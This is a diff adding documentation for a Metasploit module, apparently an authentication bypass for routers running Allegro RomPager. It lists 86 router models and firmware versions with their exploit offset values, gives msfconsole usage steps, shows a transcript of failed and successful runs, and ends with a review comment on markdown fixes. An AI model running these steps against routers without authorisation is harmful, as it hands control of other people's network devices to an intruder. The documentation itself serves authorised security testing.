| 1 | +## Vulnerable devices |
| 2 | + |
| 3 | +Following is list of devices and firmware versions with known values used for exploitation |
| 4 | +0. Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1 |
| 5 | +1. Billion BiPAC 5102S - Av2.7.0.23 (UE0.B1C) |
| 6 | +2. Billion BiPAC 5102S - Bv2.7.0.23 (UE0.B1C) |
| 7 | +3. Billion BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6 |
| 8 | +4. Billion BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0 |
| 9 | +5. Billion BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0 |
| 10 | +6. Billion BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0 |
| 11 | +7. Billion BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52 |
| 12 | +8. Billion BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0 |
| 13 | +9. Billion BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0 |
| 14 | +10. Billion BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22 |
| 15 | +11. D-Link DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL |
| 16 | +12. D-Link DSL-2600U - Z1_DSL-2600U |
| 17 | +13. D-Link DSL-2600U - Z2_V1.08_ras |
| 18 | +14. TP-Link TD-8616 - V2_080513 |
| 19 | +15. TP-Link TD-8816 - V4_100528_Russia |
| 20 | +16. TP-Link TD-8816 - V4_100524 |
| 21 | +17. TP-Link TD-8816 - V5_100528_Russia |
| 22 | +18. TP-Link TD-8816 - V5_100524 |
| 23 | +19. TP-Link TD-8816 - V5_100903 |
| 24 | +20. TP-Link TD-8816 - V6_100907 |
| 25 | +21. TP-Link TD-8816 - V7_111103 |
| 26 | +22. TP-Link TD-8816 - V7_130204 |
| 27 | +23. TP-Link TD-8817 - V5_100524 |
| 28 | +24. TP-Link TD-8817 - V5_100702_TR |
| 29 | +25. TP-Link TD-8817 - V5_100903 |
| 30 | +26. TP-Link TD-8817 - V6_100907 |
| 31 | +27. TP-Link TD-8817 - V6_101221 |
| 32 | +28. TP-Link TD-8817 - V7_110826 |
| 33 | +29. TP-Link TD-8817 - V7_130217 |
| 34 | +30. TP-Link TD-8817 - V7_120509 |
| 35 | +31. TP-Link TD-8817 - V8_140311 |
| 36 | +32. TP-Link TD-8820 - V3_091223 |
| 37 | +33. TP-Link TD-8840T - V1_080520 |
| 38 | +34. TP-Link TD-8840T - V2_100525 |
| 39 | +35. TP-Link TD-8840T - V2_100702_TR |
| 40 | +36. TP-Link TD-8840T - V2_090609 |
| 41 | +37. TP-Link TD-8840T - V3_101208 |
| 42 | +38. TP-Link TD-8840T - V3_110221 |
| 43 | +39. TP-Link TD-8840T - V3_120531 |
| 44 | +40. TP-Link TD-W8101G - V1_090107 |
| 45 | +41. TP-Link TD-W8101G - V1_090107 |
| 46 | +42. TP-Link TD-W8101G - V2_100819 |
| 47 | +43. TP-Link TD-W8101G - V2_101015_TR |
| 48 | +44. TP-Link TD-W8101G - V2_101101 |
| 49 | +45. TP-Link TD-W8101G - V3_110119 |
| 50 | +46. TP-Link TD-W8101G - V3_120213 |
| 51 | +47. TP-Link TD-W8101G - V3_120604 |
| 52 | +48. TP-Link TD-W8151N - V3_120530 |
| 53 | +49. TP-Link TD-W8901G - V1_080522 |
| 54 | +50. TP-Link TD-W8901G - V1,2_080522 |
| 55 | +51. TP-Link TD-W8901G - V2_090113_Turkish |
| 56 | +52. TP-Link TD-W8901G - V3_140512 |
| 57 | +53. TP-Link TD-W8901G - V3_100603 |
| 58 | +54. TP-Link TD-W8901G - V3_100702_TR |
| 59 | +55. TP-Link TD-W8901G - V3_100901 |
| 60 | +56. TP-Link TD-W8901G - V6_110119 |
| 61 | +57. TP-Link TD-W8901G - V6_110915 |
| 62 | +58. TP-Link TD-W8901G - V6_120418 |
| 63 | +59. TP-Link TD-W8901G - V6_120213 |
| 64 | +60. TP-Link TD-W8901GB - V3_100727 |
| 65 | +61. TP-Link TD-W8901GB - V3_100820 |
| 66 | +62. TP-Link TD-W8901N - V1_111211 |
| 67 | +63. TP-Link TD-W8951ND - V1_101124,100723,100728 |
| 68 | +64. TP-Link TD-W8951ND - V1_110907 |
| 69 | +65. TP-Link TD-W8951ND - V1_111125 |
| 70 | +66. TP-Link TD-W8951ND - V3.0_110729_FI |
| 71 | +67. TP-Link TD-W8951ND - V3_110721 |
| 72 | +68. TP-Link TD-W8951ND - V3_20110729_FI |
| 73 | +69. TP-Link TD-W8951ND - V4_120511 |
| 74 | +70. TP-Link TD-W8951ND - V4_120607 |
| 75 | +71. TP-Link TD-W8951ND - V4_120912_FL |
| 76 | +72. TP-Link TD-W8961NB - V1_110107 |
| 77 | +73. TP-Link TD-W8961NB - V1_110519 |
| 78 | +74. TP-Link TD-W8961NB - V2_120319 |
| 79 | +75. TP-Link TD-W8961NB - V2_120823 |
| 80 | +76. TP-Link TD-W8961ND - V1_100722,101122 |
| 81 | +77. TP-Link TD-W8961ND - V1_101022_TR |
| 82 | +78. TP-Link TD-W8961ND - V1_111125 |
| 83 | +79. TP-Link TD-W8961ND - V2_120427 |
| 84 | +80. TP-Link TD-W8961ND - V2_120710_UK |
| 85 | +81. TP-Link TD-W8961ND - V2_120723_FI |
| 86 | +82. TP-Link TD-W8961ND - V3_120524,120808 |
| 87 | +83. TP-Link TD-W8961ND - V3_120830 |
| 88 | +84. ZyXEL P-660R-T3 - 3.40(BOQ.0)C0 |
| 89 | +85. ZyXEL P-660RU-T3 - 3.40(BJR.0)C0 |
| 90 | + |
| 91 | +## Verification Steps |
| 92 | + |
| 93 | + 1. Start msfconsole |
| 94 | + 2. Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass``` |
| 95 | + 3. Do: ```set rhost <ip>``` |
| 96 | + 4. Do: ```set rport <port>``` |
| 97 | + 5. Do: ```set device <device-id>``` |
| 98 | + 6. Do: ```run``` |
| 99 | + 7. You should be able to login into the device without authentication |
| 100 | + |
| 101 | +## Scenarios |
| 102 | + |
| 103 | + Example run against TP-Link TD-8840T with firmware V2_100525: |
| 104 | +``` |
| 105 | +msf > use auxiliary/admin/http/allegro_rompager_auth_bypass |
| 106 | +msf auxiliary(allegro_rompager_auth_bypass) > devices |
| 107 | +
|
| 108 | +List of vulnerable devices |
| 109 | +========================== |
| 110 | +
|
| 111 | + ID Name Model Firmware Number Offset |
| 112 | + -- ---- ----- -------- ------ ------ |
| 113 | + 0 Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1 107367693 13 |
| 114 | + 1 Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C) 107369694 13 |
| 115 | + 2 Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C) 107369694 13 |
| 116 | + 3 Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6 107369545 9 |
| 117 | + 4 Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0 107371218 21 |
| 118 | + 5 Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0 107366366 25 |
| 119 | + 6 Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0 107371453 9 |
| 120 | + 7 Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52 107367690 21 |
| 121 | + 8 Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0 107368270 1 |
| 122 | + 9 Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0 107371378 37 |
| 123 | + 10 Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22 107371218 13 |
| 124 | + 11 D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL 107368902 25 |
| 125 | + 12 D-Link DSL-2600U Z1_DSL-2600U 107366496 13 |
| 126 | + 13 D-Link DSL-2600U Z2_V1.08_ras 107360133 20 |
| 127 | + 14 TP-Link TD-8616 V2_080513 107371483 21 |
| 128 | + 15 TP-Link TD-8816 V4_100528_Russia 107369790 17 |
| 129 | + 16 TP-Link TD-8816 V4_100524 107369790 17 |
| 130 | + 17 TP-Link TD-8816 V5_100528_Russia 107369790 17 |
| 131 | + 18 TP-Link TD-8816 V5_100524 107369790 17 |
| 132 | + 19 TP-Link TD-8816 V5_100903 107369790 17 |
| 133 | + 20 TP-Link TD-8816 V6_100907 107371426 17 |
| 134 | + 21 TP-Link TD-8816 V7_111103 107371161 1 |
| 135 | + 22 TP-Link TD-8816 V7_130204 107370211 5 |
| 136 | + 23 TP-Link TD-8817 V5_100524 107369790 17 |
| 137 | + 24 TP-Link TD-8817 V5_100702_TR 107369790 17 |
| 138 | + 25 TP-Link TD-8817 V5_100903 107369790 17 |
| 139 | + 26 TP-Link TD-8817 V6_100907 107369788 1 |
| 140 | + 27 TP-Link TD-8817 V6_101221 107369788 1 |
| 141 | + 28 TP-Link TD-8817 V7_110826 107369522 25 |
| 142 | + 29 TP-Link TD-8817 V7_130217 107369316 21 |
| 143 | + 30 TP-Link TD-8817 V7_120509 107369321 9 |
| 144 | + 31 TP-Link TD-8817 V8_140311 107351277 20 |
| 145 | + 32 TP-Link TD-8820 V3_091223 107369768 17 |
| 146 | + 33 TP-Link TD-8840T V1_080520 107369845 5 |
| 147 | + 34 TP-Link TD-8840T V2_100525 107369790 17 |
| 148 | + 35 TP-Link TD-8840T V2_100702_TR 107369790 17 |
| 149 | + 36 TP-Link TD-8840T V2_090609 107369570 1 |
| 150 | + 37 TP-Link TD-8840T V3_101208 107369766 17 |
| 151 | + 38 TP-Link TD-8840T V3_110221 107369764 5 |
| 152 | + 39 TP-Link TD-8840T V3_120531 107369688 17 |
| 153 | + 40 TP-Link TD-W8101G V1_090107 107367772 37 |
| 154 | + 41 TP-Link TD-W8101G V1_090107 107367808 21 |
| 155 | + 42 TP-Link TD-W8101G V2_100819 107367751 21 |
| 156 | + 43 TP-Link TD-W8101G V2_101015_TR 107367749 13 |
| 157 | + 44 TP-Link TD-W8101G V2_101101 107367749 13 |
| 158 | + 45 TP-Link TD-W8101G V3_110119 107367765 25 |
| 159 | + 46 TP-Link TD-W8101G V3_120213 107367052 25 |
| 160 | + 47 TP-Link TD-W8101G V3_120604 107365835 1 |
| 161 | + 48 TP-Link TD-W8151N V3_120530 107353867 24 |
| 162 | + 49 TP-Link TD-W8901G V1_080522 107367787 21 |
| 163 | + 50 TP-Link TD-W8901G V1,2_080522 107368013 5 |
| 164 | + 51 TP-Link TD-W8901G V2_090113_Turkish 107368013 5 |
| 165 | + 52 TP-Link TD-W8901G V3_140512 107367854 9 |
| 166 | + 53 TP-Link TD-W8901G V3_100603 107367751 21 |
| 167 | + 54 TP-Link TD-W8901G V3_100702_TR 107367751 21 |
| 168 | + 55 TP-Link TD-W8901G V3_100901 107367749 13 |
| 169 | + 56 TP-Link TD-W8901G V6_110119 107367765 25 |
| 170 | + 57 TP-Link TD-W8901G V6_110915 107367682 21 |
| 171 | + 58 TP-Link TD-W8901G V6_120418 107365835 1 |
| 172 | + 59 TP-Link TD-W8901G V6_120213 107367052 25 |
| 173 | + 60 TP-Link TD-W8901GB V3_100727 107367756 13 |
| 174 | + 61 TP-Link TD-W8901GB V3_100820 107369393 21 |
| 175 | + 62 TP-Link TD-W8901N V1_111211 107353880 0 |
| 176 | + 63 TP-Link TD-W8951ND V1_101124,100723,100728 107369839 25 |
| 177 | + 64 TP-Link TD-W8951ND V1_110907 107369876 13 |
| 178 | + 65 TP-Link TD-W8951ND V1_111125 107369876 13 |
| 179 | + 66 TP-Link TD-W8951ND V3.0_110729_FI 107366743 21 |
| 180 | + 67 TP-Link TD-W8951ND V3_110721 107366743 21 |
| 181 | + 68 TP-Link TD-W8951ND V3_20110729_FI 107366743 21 |
| 182 | + 69 TP-Link TD-W8951ND V4_120511 107364759 25 |
| 183 | + 70 TP-Link TD-W8951ND V4_120607 107364759 13 |
| 184 | + 71 TP-Link TD-W8951ND V4_120912_FL 107364760 21 |
| 185 | + 72 TP-Link TD-W8961NB V1_110107 107369844 17 |
| 186 | + 73 TP-Link TD-W8961NB V1_110519 107369844 17 |
| 187 | + 74 TP-Link TD-W8961NB V2_120319 107367629 21 |
| 188 | + 75 TP-Link TD-W8961NB V2_120823 107366421 13 |
| 189 | + 76 TP-Link TD-W8961ND V1_100722,101122 107369839 25 |
| 190 | + 77 TP-Link TD-W8961ND V1_101022_TR 107369839 25 |
| 191 | + 78 TP-Link TD-W8961ND V1_111125 107369876 13 |
| 192 | + 79 TP-Link TD-W8961ND V2_120427 107364732 25 |
| 193 | + 80 TP-Link TD-W8961ND V2_120710_UK 107364771 37 |
| 194 | + 81 TP-Link TD-W8961ND V2_120723_FI 107364762 29 |
| 195 | + 82 TP-Link TD-W8961ND V3_120524,120808 107353880 0 |
| 196 | + 83 TP-Link TD-W8961ND V3_120830 107353414 36 |
| 197 | + 84 ZyXEL P-660R-T3 3.40(BOQ.0)C0 107369567 21 |
| 198 | + 85 ZyXEL P-660RU-T3 3.40(BJR.0)C0 107369567 21 |
| 199 | +
|
| 200 | +msf auxiliary(allegro_rompager_auth_bypass) > show options |
| 201 | +
|
| 202 | +Module options (auxiliary/admin/http/allegro_rompager_auth_bypass): |
| 203 | +
|
| 204 | + Name Current Setting Required Description |
| 205 | + ---- --------------- -------- ----------- |
| 206 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 207 | + RHOST yes The target address |
| 208 | + RPORT 80 yes The target port |
| 209 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 210 | + TARGETURI / yes URI to test |
| 211 | + VHOST no HTTP server virtual host |
| 212 | + device yes ID of device from list of vulnerable devices |
| 213 | +
|
| 214 | +msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1 |
| 215 | +rhost => 192.168.1.1 |
| 216 | +msf auxiliary(allegro_rompager_auth_bypass) > set device 33 |
| 217 | +device => 33 |
| 218 | +msf auxiliary(allegro_rompager_auth_bypass) > run |
| 219 | +
|
| 220 | +[*] Device name: TP-Link |
| 221 | +[*] Device model: TD-8840T |
| 222 | +[*] Device firmware: V1_080520 |
| 223 | +[-] Exploit failed |
| 224 | +[*] Auxiliary module execution completed |
| 225 | +msf auxiliary(allegro_rompager_auth_bypass) > set device 34 |
| 226 | +device => 34 |
| 227 | +msf auxiliary(allegro_rompager_auth_bypass) > run |
| 228 | +
|
| 229 | +[*] Device name: TP-Link |
| 230 | +[*] Device model: TD-8840T |
| 231 | +[*] Device firmware: V2_100525 |
| 232 | +[+] Exploit sent, please check host, authentication should be disabled |
| 233 | +[*] Auxiliary module execution completed |
| 234 | +``` |
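Review bot: the first device entry under `## Vulnerable devices` will not render as a list item. `0. Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1` follows the intro sentence with no blank line between them, and in CommonMark/GitHub markdown an ordered list can only interrupt a paragraph when it starts at 1, so the Azmoon line is absorbed into the intro paragraph and the rendered list begins at `1. Billion BiPAC 5102S`; device ID 0 disappears as a list entry. Insert a blank line after `Following is list of devices and firmware versions with known values used for exploitation` (and fix that sentence to `The following is a list of devices and firmware versions with the known values used for exploitation`). Related: the `Number` and `Offset` columns in the `devices` output are evidently those "known values", but nothing in the doc says so; one sentence explaining them would help. In `## Verification Steps`, step 5 tells the reader to `set device <device-id>` but never mentions the module's `devices` command that the Scenarios transcript uses to look the ID up, so add it as a step (and `login into the device` in step 7 should read `log in to the device`). In `## Scenarios`, the text promises a run against `TD-8840T` with `V2_100525`, yet the transcript first does `set device 33` (firmware `V1_080520`, ending in `[-] Exploit failed`) before `set device 34` succeeds; either state that the first attempt shows what a wrong ID looks like or drop it. That example matters because the table contains entries that cannot be told apart by firmware string alone (IDs 40 and 41 are both `TD-W8101G V1_090107` with different Number/Offset values), so the doc should say that more than one ID may need to be tried for the same firmware string, and that `[+] Exploit sent, please check host, authentication should be disabled` means the module does not itself confirm the bypass worked.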